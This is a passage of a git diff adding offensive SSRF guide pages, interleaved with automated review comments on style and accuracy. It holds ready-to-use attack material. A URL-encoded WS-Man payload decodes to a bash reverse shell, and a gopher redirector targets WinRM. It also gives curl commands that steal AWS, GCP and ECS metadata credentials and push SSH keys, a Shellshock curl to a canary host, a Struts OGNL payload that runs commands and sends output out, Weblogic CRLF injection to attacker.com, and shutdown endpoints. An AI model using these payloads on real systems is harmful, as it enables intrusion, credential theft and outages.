%4d%65%73%73%61%67%65%49%44%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%50%54%31%4d%33%30%53%3c%2f%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%
3c%77%3a%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%70%3a%44%61%74%61%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%74%69%6f%6e%53%65%74%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%20%4e%61%6d%65%3d%22%5f%5f%63%69%6d%6e%61%6d%65%73%70%61%63%65%22%3e%72%6f%6f%74%2f%73%63%78%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%3e%0a%20%20%20%20%20%20%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%3c%2f%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%3c%73%3a%42%6f%64%79%3e%0a%20%20%20%20%20%20%3c%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%22%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%63%6f%6d%6d%61%6e%64%3e%65%63%68%6f%20%2d%6e%20%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%43%34%78%4d%43%34%78%4e%43%34%78%4d%53%38%35%4d%44%41%78%49%44%41%2b%4a%6a%45%3d%20%7c%20%62%61%73%65%36%34%20%2d%64%20%7c%20%62%61%73%68%3c%2f%70%3a%63%6f%6d%6d%61%6e%64%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%74%69%6d%65%6f%75%74%3e%30%3c%2f%70%3a%74%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%2f%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%3e%0a%20%20%20%3c%2f%73%3a%42%6f%64%79%3e%0a%3c%2f%73%3a%45%6e%76%65%6c%6f%70%65%3e%0a")
+ self.end_headers()
+
+httpd = HTTPServer(('0.0.0.0', 443), MainHandler)
+httpd.socket = ssl.wrap_socket(httpd.socket, certfile="server.pem", server_side=True)
+httpd.serve_forever()
+```
+
+```python
+from flask import Flask, redirect
+from urllib.parse import quote
+app = Flask(__name__)
+
+@app.route('/')
+def root():
+ return redirect('gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20', code=301)
+
+if __name__ == "__main__":
+ app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
+```
+
+### Abusing DNS Rebidding + TLS Session ID/Session ticket
+
+Requirements:
+
+* **SSRF**
+* **Outbound TLS sessions**
+* **Stuff on local ports**
+
+Attack:
+
+1. Ask the user/bot **access** a **domain** controlled by the **attacker**
+2. The **TTL** of the **DNS** is **0** sec (so the victim will check the IP of the domain again soon)
+3. A **TLS connection** is created between the victim and the domain of the attacker. The attacker introduces the **payload inside** the **Session ID or Session Ticket**.
+4. The **domain** will start an **infinite loop** of redirects against **himself**. The goal of this is to make the user/bot access the domain until it perform **again** a **DNS request** of the domain.
+5. In the DNS request a **private IP** address is given **now** (127.0.0.1 for example)
+6. The user/bot will try to **reestablish the TLS connection** and in order to do so it will **send** the **Session** ID/Ticket ID (where the **payload** of the attacker was contained). So congratulations you managed to ask the **user/bot attack himself**.
+
+Note that during this attack, if you want to attack localhost:11211 (_memcache_) you need to make the victim establish the initial connection with www.attacker.com:11211 (the **port must always be the same**).\
+To **perform this attack you can use the tool**: [https://github.com/jmdx/TLS-poison/](https://github.com/jmdx/TLS-poison/)\
+For **more information** take a look to the talk where this attack is explained: [https://www.youtube.com/watch?v=qGpAJxfADjo\&ab\_channel=DEFCONConference](https://www.youtube.com/watch?v=qGpAJxfADjo\&ab\_channel=DEFCONConference)
+
+### Automated DNS Rebidding
+
+**``**[**`Singularity of Origin`**](https://github.com/nccgroup/singularity) is a tool to perform [DNS rebinding](https://en.wikipedia.org/wiki/DNS\_rebinding) attacks. It includes the necessary components to rebind the IP address of the attack server DNS name to the target machine's IP address and to serve attack payloads to exploit vulnerable software on the target machine.
+
+Check out also the publicly running server in [http://rebind.it/singularity.html](http://rebind.it/singularity.html)
+
+## Blind SSRF
+
+The difference between a blind SSRF and a not blind one is that in the blind you cannot see the response of the SSRF request. Then, it is more difficult to exploit because you will be able to exploit only well-known vulnerabilities.
+
+### Time based SSRF
+
+**Checking the time** of the responses from the server it might be **possible to know if a resource exists or not** (maybe it takes more time accessing an existing resource than accessing one that doesn't exist)
+
+## Cloud SSRF Exploitation
+
+If you find a SSRF vulnerability in a machine running inside a cloud environment you might be able to obtain interesting information about the cloud environment and even credentials:
+
+{% content-ref url="cloud-ssrf.md" %}
+[cloud-ssrf.md](cloud-ssrf.md)
+{% endcontent-ref %}
+
+## SSRF Vulnerable Platforms
+
+Several known platforms contains or has contained SSRF vulnerabilities, check them in:
+
+{% content-ref url="ssrf-vulnerable-platforms.md" %}
+[ssrf-vulnerable-platforms.md](ssrf-vulnerable-platforms.md)
+{% endcontent-ref %}
+
+## Tools
+
+### ****[**SSRFMap**](https://github.com/swisskyrepo/SSRFmap)****
+
+Tool to detect and exploit SSRF vulnerabilities
+
+### [Gopherus](https://github.com/tarunkant/Gopherus)
+
+* [Blog post on Gopherus](https://spyclub.tech/2018/08/14/2018-08-14-blog-on-gopherus/)
+
+This tool generates Gopher payloads for:
+
+* MySQL
+* PostgreSQL
+* FastCGI
+* Redis
+* Zabbix
+* Memcache
+
+### [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
+
+* [Blog post on SSRF usage](https://blog.tneitzel.eu/posts/01-attacking-java-rmi-via-ssrf/)
+
+_remote-method-guesser_ is a _Java RMI_ vulnerability scanner that supports attack operations for most common _Java RMI_ vulnerabilities. Most of the available operations support the `--ssrf` option, to generate an _SSRF_ payload for the requested operation. Together with the `--gopher` option, ready to use _gopher_ payloads can be generated directly.
+
+### [SSRF Proxy](https://github.com/bcoles/ssrf\_proxy)
+
+SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP traffic through HTTP servers vulnerable to Server-Side Request Forgery (SSRF).
+
+### To practice
+
+{% embed url="https://github.com/incredibleindishell/SSRF_Vulnerable_Lab" %}
+
+## References
+
+* [https://medium.com/@pravinponnusamy/ssrf-payloads-f09b2a86a8b4](https://medium.com/@pravinponnusamy/ssrf-payloads-f09b2a86a8b4)
+* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery)
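Review bot: `httpd.socket = ssl.wrap_socket(httpd.socket, certfile="server.pem", server_side=True)` in the first Python redirector uses `ssl.wrap_socket`, which is deprecated since Python 3.7 and removed in 3.12, so the example stops running on a current interpreter; build a context with `ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)`, call `ctx.load_cert_chain("server.pem")` and wrap with `ctx.wrap_socket(httpd.socket, server_side=True)`. The Flask redirect target `gopher://127.0.0.1:5985/_%50%4f%53%54...%48%6f%73%74%3a%20` ends after `Host: ` with no sentence saying it is only the prefix of the WS-Man request from the previous block; say so above the fence. Two headings read `### Abusing DNS Rebidding + TLS Session ID/Session ticket` and `### Automated DNS Rebidding` while the link text in the same section says "DNS rebinding"; correct the spelling in both. The Singularity paragraph opens with an empty bold pair (`**``**`) and the SSRFMap heading is wrapped in `****`; both render as stray characters in GitBook and should go. Grammar in the attack steps: "Ask the user/bot **access** a **domain**" lacks "to", "redirects against **himself**" should be "itself", and "Several known platforms contains or has contained" should be "contain or have contained".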
diff --git a/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md
new file mode 100644
index 000000000..a47100f57
--- /dev/null
+++ b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md
@@ -0,0 +1,242 @@
+# Cloud SSRF
+
+## AWS
+
+### Abusing SSRF in AWS EC2 environment
+
+#### 169.254.169.254 - Metadata Address
+
+**Metadata** of the basic virtual machines from AWS (called EC2) can be retrieved from the VM accessing the url: `http://169.254.169.254` ([information about the metadata here](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html)).
+
+The IP address 169.254.169.254 is a magic IP in the cloud world. AWS, Azure, Google, DigitalOcean and others use this to allow cloud resources to find out metadata about themselves. Some, such as Google, have additional constraints on the requests, such as requiring it to use `Metadata-Flavor: Google` as an HTTP header and refusing requests with an `X-Forwarded-For` header. **AWS has no constraints**.
+
+Sending a GET requests to the following endpoint will **dump a list of roles** that are attached to the current EC2 instance:
+
+```
+http://169.254.169.254/latest/meta-data/iam/security-credentials/
+```
+
+If you want to access your S3 bucket you would normally hard-code your API keys into your application. Hard-coding clear text passwords is a bad idea. This is why you can assign your EC2 instance a role which can be used to access your S3 bucket. These credentials are automatically rotated by AWS and can be access thought the metadata API.
+
+Once you get a list of roles attached to the EC2 instance you can **dump their credentials** by making a GET requests to the following URL:
+
+```
+http://169.254.169.254/latest/meta-data/iam/security-credentials/
+```
+
+As an example you can visit: [http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws](http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws)
+
+The response should look something like this:
+
+```
+{
+ "Code" : "Success",
+ "LastUpdated" : "2019-08-03T20:42:03Z",
+ "Type" : "AWS-HMAC",
+ "AccessKeyId" : "ASIA5A6IYGGDLBWIFH5UQ",
+ "SecretAccessKey" : "sMX7//Ni2tu2hJua/fOXGfrapiq9PbyakBcJunpyR",
+ "Token" : "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",
+ "Expiration" : "2019-08-04T03:16:50Z"
+}
+```
+
+You can then take **those credentials and use them with the AWS CLI**. This will allow you to do **anything that role has permissions** to do. If the role has improper permissions set (Most likely) you will be able to do all kinds of things, you might even be able to take over their entire cloud network.
+
+To take advantage of the new credentials, you will need to crate a new AWS profile like this one:
+
+```
+[profilename]
+aws_access_key_id = ASIA6GG7PSQG4TCGYYOU
+aws_secret_access_key = a5kssI2I4H/atUZOwBr5Vpggd9CxiT5pUkyPJsjC
+aws_session_token = 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
+```
+
+Notice the **aws\_session\_token**, this is indispensable for the profile to work.\
+Information taken from: [http://ghostlulz.com/ssrf-aws-credentials/](http://ghostlulz.com/ssrf-aws-credentials/) (read that post for further information).\
+Another possible interesting place where you can find credentials is in[ http://169.254.169.254/user-data](http://169.254.169.254/user-data)
+
+[**PACU**](https://github.com/RhinoSecurityLabs/pacu) can be used with the discovered credentials to find out your privileges and try to escalate privileges
+
+### SSRF in AWS ECS (Container Service) credentials
+
+**ECS**, is a logical group of EC2 instances on which you can run an application without having to scale your own cluster management infrastructure because ECS manages that for you. If you manage to compromise service running in **ECS**, the **metadata endpoints change**.
+
+If you access _**http://169.254.170.2/v2/credentials/\**_ you will find the credentials of the ECS machine. But first you need to **find the \_\**\_ . To find the \ you need to read the **environ** variable **AWS\_CONTAINER\_CREDENTIALS\_RELATIVE\_URI** inside the machine.\
+You could be able to read it exploiting an **Path Traversal** to _file:///proc/self/environ_\
+\_\_The mentioned http address should give you the **AccessKey, SecretKey and token**.
+
+```bash
+curl "http://169.254.170.2/$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" 2>/dev/null || wget "http://169.254.170.2/$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" -O -
+```
+
+### SSRF URL for AWS Elastic Beanstalk
+
+We retrieve the `accountId` and `region` from the API.
+
+```
+http://169.254.169.254/latest/dynamic/instance-identity/document
+http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role
+```
+
+We then retrieve the `AccessKeyId`, `SecretAccessKey`, and `Token` from the API.
+
+```
+http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role
+```
+
+![](https://miro.medium.com/max/60/0\*4OG-tRUNhpBK96cL?q=20) ![](https://miro.medium.com/max/1469/0\*4OG-tRUNhpBK96cL)
+
+Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`.
+
+## GCP
+
+### SSRF URL for Google Cloud
+
+Requires the header “Metadata-Flavor: Google” or “X-Google-Metadata-Request: True”
+
+```
+http://169.254.169.254/computeMetadata/v1/
+http://metadata.google.internal/computeMetadata/v1/
+http://metadata/computeMetadata/v1/
+http://metadata.google.internal/computeMetadata/v1/instance/hostname
+http://metadata.google.internal/computeMetadata/v1/instance/id
+http://metadata.google.internal/computeMetadata/v1/project/project-id
+```
+
+Google allows recursive pulls
+
+```
+http://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true
+```
+
+Beta does NOT require a header atm (thanks Mathias Karlsson @avlidienbrunn)
+
+```
+http://metadata.google.internal/computeMetadata/v1beta1/
+http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true
+```
+
+Interesting files to pull out:
+
+* SSH Public Key : [`http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json`](http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json)
+* Get Access Token : [`http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token`](http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token)
+* Kubernetes Key : [`http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json`](http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json)
+
+### Add an SSH key
+
+Extract the token
+
+```
+http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token?alt=json
+```
+
+Check the scope of the token
+
+```
+$ curl https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=ya29.XXXXXKuXXXXXXXkGT0rJSA {
+ "issued_to": "101302079XXXXX",
+ "audience": "10130207XXXXX",
+ "scope": "https://www.googleapis.com/auth/compute https://www.googleapis.com/auth/logging.write https://www.googleapis.com/auth/devstorage.read_write https://www.googleapis.com/auth/monitoring",
+ "expires_in": 2443,
+ "access_type": "offline"
+}
+```
+
+Now push the SSH key.
+
+```
+curl -X POST "https://www.googleapis.com/compute/v1/projects/1042377752888/setCommonInstanceMetadata"
+-H "Authorization: Bearer ya29.c.EmKeBq9XI09_1HK1XXXXXXXXT0rJSA"
+-H "Content-Type: application/json"
+--data '{"items": [{"key": "sshkeyname", "value": "sshkeyvalue"}]}'
+```
+
+## Digital Ocean
+
+Documentation available at [`https://developers.digitalocean.com/documentation/metadata/`](https://developers.digitalocean.com/documentation/metadata/)
+
+```
+curl http://169.254.169.254/metadata/v1/id
+http://169.254.169.254/metadata/v1.json
+http://169.254.169.254/metadata/v1/
+http://169.254.169.254/metadata/v1/id
+http://169.254.169.254/metadata/v1/user-data
+http://169.254.169.254/metadata/v1/hostname
+http://169.254.169.254/metadata/v1/region
+http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/addressAll in one request:
+curl http://169.254.169.254/metadata/v1.json | jq
+```
+
+## Packetcloud
+
+Documentation available at [`https://metadata.packet.net/userdata`](https://metadata.packet.net/userdata)
+
+## Azure
+
+Limited, maybe more exists? [`https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/`](https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/)
+
+[http://169.254.169.254/metadata/v1/maintenance](http://169.254.169.254/metadata/v1/maintenance)
+
+Update Apr 2017, Azure has more support; requires the header “Metadata: true” [`https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service`](https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service)
+
+```
+http://169.254.169.254/metadata/instance?api-version=2017-04-02
+http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text
+```
+
+## OpenStack/RackSpace
+
+(header required? unknown)
+
+```
+http://169.254.169.254/openstack
+```
+
+## HP Helion
+
+(header required? unknown)
+
+```
+http://169.254.169.254/2009-04-04/meta-data/
+```
+
+## Oracle Cloud
+
+```
+http://192.0.0.192/latest/
+http://192.0.0.192/latest/user-data/
+http://192.0.0.192/latest/meta-data/
+http://192.0.0.192/latest/attributes/
+```
+
+## Alibaba
+
+```
+http://100.100.100.200/latest/meta-data/
+http://100.100.100.200/latest/meta-data/instance-id
+http://100.100.100.200/latest/meta-data/image-id
+```
+
+## Kubernetes ETCD
+
+Can contain API keys and internal ip and ports
+
+```
+curl -L http://127.0.0.1:2379/version
+curl http://127.0.0.1:2379/v2/keys/?recursive=true
+```
+
+## Docker
+
+```
+http://127.0.0.1:2375/v1.24/containers/jsonSimple example
+docker run -ti -v /var/run/docker.sock:/var/run/docker.sock bash
+bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json
+bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json
+```
+
+## Rancher
+
+```
+curl http://rancher-metadata//
+```
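Review bot: The "dump their credentials" block repeats the role-listing URL `http://169.254.169.254/latest/meta-data/iam/security-credentials/` verbatim, so the text never says that the role name must be appended, even though the flaws.cloud example two lines later ends in `/flaws`; show the second block as `.../security-credentials/<ROLE_NAME>`. Likewise `http://169.254.169.254/user-data` lacks the `/latest/` prefix that every other EC2 path in this file uses. The Elastic Beanstalk role `aws-elasticbeanorastalk-ec2-role` appears twice and looks like a typo of `aws-elasticbeanstalk-ec2-role`. In the ECS paragraph the GUID placeholder has been mangled by escaping (`_**http://169.254.170.2/v2/credentials/\**_`, `\_\**\_`, `\_\_The mentioned`); write it as a literal `<GUID>` so the sentence parses. Two fences have prose fused onto their last URL (`.../ipv6/addressAll in one request:` and `.../containers/jsonSimple example`); move that text outside the code block. The sentence "**AWS has no constraints**" should be qualified: instances enforcing IMDSv2 require a session token obtained with a PUT to `/latest/api/token` and sent back in the `X-aws-ec2-metadata-token` header, which is the mitigation a reader of this page would want to know about. Typos: "can be access thought" and "crate a new AWS profile".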
diff --git a/pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms.md b/pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms.md
new file mode 100644
index 000000000..5654d0324
--- /dev/null
+++ b/pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms.md
@@ -0,0 +1,643 @@
+# SSRF Vulnerable Platforms
+
+This section was copied from [https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/](https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/)
+
+## Elasticsearch
+
+**Commonly bound port: 9200**
+
+When Elasticsearch is deployed internally, it usually does not require authentication.
+
+If you have a partially blind SSRF where you can determine the status code, check to see if the following endpoints return a 200:
+
+```http
+/_cluster/health
+/_cat/indices
+/_cat/health
+```
+
+If you have a blind SSRF where you can send POST requests, you can shut down the Elasticsearch instance by sending a POST request to the following path:
+
+Note: the `_shutdown` API has been removed from Elasticsearch version 2.x. and up. This only works in Elasticsearch 1.6 and below:
+
+```http
+/_shutdown
+/_cluster/nodes/_master/_shutdown
+/_cluster/nodes/_shutdown
+/_cluster/nodes/_all/_shutdown
+```
+
+## Weblogic
+
+**Commonly bound ports: 80, 443 (SSL), 7001, 8888**
+
+**SSRF Canary: UDDI Explorer (CVE-2014-4210)**
+
+```http
+POST /uddiexplorer/SearchPublicRegistries.jsp HTTP/1.1
+Host: target.com
+Content-Length: 137
+Content-Type: application/x-www-form-urlencoded
+
+operator=http%3A%2F%2FSSRF_CANARY&rdoSearch=name&txtSearchname=test&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search
+```
+
+This also works via GET:
+
+```bash
+http://target.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http%3A%2F%2FSSRF_CANARY&rdoSearch=name&txtSearchname=test&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search
+```
+
+This endpoint is also vulnerable to CRLF injection:
+
+```
+GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://attacker.com:4000/exp%20HTTP/1.11%0AX-CLRF%3A%20Injected%0A&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search HTTP/1.0
+Host: vuln.weblogic
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
+Connection: close
+```
+
+Will result in the following request:
+
+```
+root@mail:~# nc -lvp 4000
+Listening on [0.0.0.0] (family 0, port 4000)
+Connection from example.com 43111 received!
+POST /exp HTTP/1.11
+X-CLRF: Injected HTTP/1.1
+Content-Type: text/xml; charset=UTF-8
+soapAction: ""
+Content-Length: 418
+User-Agent: Java1.6.0_24
+Host: attacker.com:4000
+Accept: text/html, image/gif, image/jpeg, */*; q=.2
+Connection: Keep-Alive
+
+sdf
+```
+
+**SSRF Canary: CVE-2020-14883**
+
+Taken from [here](https://forum.90sec.com/t/topic/1412).
+
+Linux:
+
+```http
+POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
+Host: vulnerablehost:7001
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 117
+
+_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://SSRF_CANARY/poc.xml")
+```
+
+Windows:
+
+```http
+POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
+Host: vulnerablehost:7001
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 117
+
+_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://SSRF_CANARY/poc.xml")
+```
+
+## Hashicorp Consul
+
+**Commonly bound ports: 8500, 8501 (SSL)**
+
+Writeup can be found [here](https://www.kernelpicnic.net/2017/05/29/Pivoting-from-blind-SSRF-to-RCE-with-Hashicorp-Consul.html).
+
+## Shellshock
+
+**Commonly bound ports: 80, 443 (SSL), 8080**
+
+In order to effectively test for Shellshock, you may need to add a header containing the payload. The following CGI paths are worth trying:
+
+Short list of CGI paths to test:
+
+[Gist containing paths](https://gist.github.com/infosec-au/009fcbdd5bad16bb6ceb36b838d96be4).
+
+**SSRF Canary: Shellshock via User Agent**
+
+```bash
+User-Agent: () { foo;}; echo Content-Type: text/plain ; echo ; curl SSRF_CANARY
+```
+
+## Apache Druid
+
+**Commonly bound ports: 80, 8080, 8888, 8082**
+
+See the API reference for Apache Druid [here](https://druid.apache.org/docs/latest/operations/api-reference.html).
+
+If you can view the status code, check the following paths to see if they return a 200 status code:
+
+```bash
+/status/selfDiscovered/status
+/druid/coordinator/v1/leader
+/druid/coordinator/v1/metadata/datasources
+/druid/indexer/v1/taskStatus
+```
+
+Shutdown tasks, requires you to guess task IDs or the datasource name:
+
+```bash
+/druid/indexer/v1/task/{taskId}/shutdown
+/druid/indexer/v1/datasources/{dataSource}/shutdownAllTasks
+```
+
+Shutdown supervisors on Apache Druid Overlords:
+
+```bash
+/druid/indexer/v1/supervisor/terminateAll
+/druid/indexer/v1/supervisor/{supervisorId}/shutdown
+```
+
+## Apache Solr
+
+**Commonly bound port: 8983**
+
+**SSRF Canary: Shards Parameter**
+
+> To add to what shubham is saying - scanning for solr is relatively easy. There is a shards= param which allows you to bounce SSRF to SSRF to verify you are hitting a solr instance blindly.
+>
+> — Хавиж Наффи 🥕 (@nnwakelam) [January 13, 2021](https://twitter.com/nnwakelam/status/1349298311853821956?ref\_src=twsrc%5Etfw)
+
+Taken from [here](https://github.com/veracode-research/solr-injection).
+
+```bash
+/search?q=Apple&shards=http://SSRF_CANARY/solr/collection/config%23&stream.body={"set-property":{"xxx":"yyy"}}
+/solr/db/select?q=orange&shards=http://SSRF_CANARY/solr/atom&qt=/select?fl=id,name:author&wt=json
+/xxx?q=aaa%26shards=http://SSRF_CANARY/solr
+/xxx?q=aaa&shards=http://SSRF_CANARY/solr
+```
+
+**SSRF Canary: Solr XXE (2017)**
+
+[Apache Solr 7.0.1 XXE (Packetstorm)](https://packetstormsecurity.com/files/144678/Apache-Solr-7.0.1-XXE-Injection-Code-Execution.html)
+
+```bash
+/solr/gettingstarted/select?q={!xmlparser v=''
+/xxx?q={!type=xmlparser v=""}
+```
+
+**RCE via dataImportHandler**
+
+[Research on RCE via dataImportHandler](https://github.com/veracode-research/solr-injection#3-cve-2019-0193-remote-code-execution-via-dataimporthandler)
+
+## PeopleSoft
+
+**Commonly bound ports: 80,443 (SSL)**
+
+Taken from this research [here](https://www.ambionics.io/blog/oracle-peoplesoft-xxe-to-rce).
+
+**SSRF Canary: XXE #1**
+
+```http
+POST /PSIGW/HttpListeningConnector HTTP/1.1
+Host: website.com
+Content-Type: application/xml
+...
+
+
+
+]>
+
+ &x;
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ your_message_content]]>
+
+
+
+
+```
+
+**SSRF Canary: XXE #2**
+
+```http
+POST /PSIGW/PeopleSoftServiceListeningConnector HTTP/1.1
+Host: website.com
+Content-Type: application/xml
+...
+
+
+```
+
+## Apache Struts
+
+**Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)**
+
+Taken from [here](https://blog.safebuff.com/2016/07/03/SSRF-Tips/).
+
+**SSRF Canary: Struts2-016**:
+
+Append this to the end of every internal endpoint/URL you know of:
+
+```http
+?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'command'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://SSRF_CANARY/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()}
+```
+
+## JBoss
+
+**Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)**
+
+Taken from [here](https://blog.safebuff.com/2016/07/03/SSRF-Tips/).
+
+**SSRF Canary: Deploy WAR from URL**
+
+```bash
+/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service=MainDeployer&methodIndex=17&arg0=http://SSRF_CANARY/utils/cmd.war
+```
+
+## Confluence
+
+**Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)**
+
+**SSRF Canary: Sharelinks (Confluence versions released from 2016 November and older)**
+
+```bash
+/rest/sharelinks/1.0/link?url=https://SSRF_CANARY/
+```
+
+**SSRF Canary: iconUriServlet - Confluence < 6.1.3 (CVE-2017-9506)**
+
+[Atlassian Security Ticket OAUTH-344](https://ecosystem.atlassian.net/browse/OAUTH-344)
+
+```bash
+/plugins/servlet/oauth/users/icon-uri?consumerUri=http://SSRF_CANARY
+```
+
+## Jira
+
+**Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)**
+
+**SSRF Canary: iconUriServlet - Jira < 7.3.5 (CVE-2017-9506)**
+
+[Atlassian Security Ticket OAUTH-344](https://ecosystem.atlassian.net/browse/OAUTH-344)
+
+```bash
+/plugins/servlet/oauth/users/icon-uri?consumerUri=http://SSRF_CANARY
+```
+
+**SSRF Canary: makeRequest - Jira < 8.4.0 (CVE-2019-8451)**
+
+[Atlassian Security Ticket JRASERVER-69793](https://jira.atlassian.com/browse/JRASERVER-69793)
+
+```bash
+/plugins/servlet/gadgets/makeRequest?url=https://SSRF_CANARY:443@example.com
+```
+
+## Other Atlassian Products
+
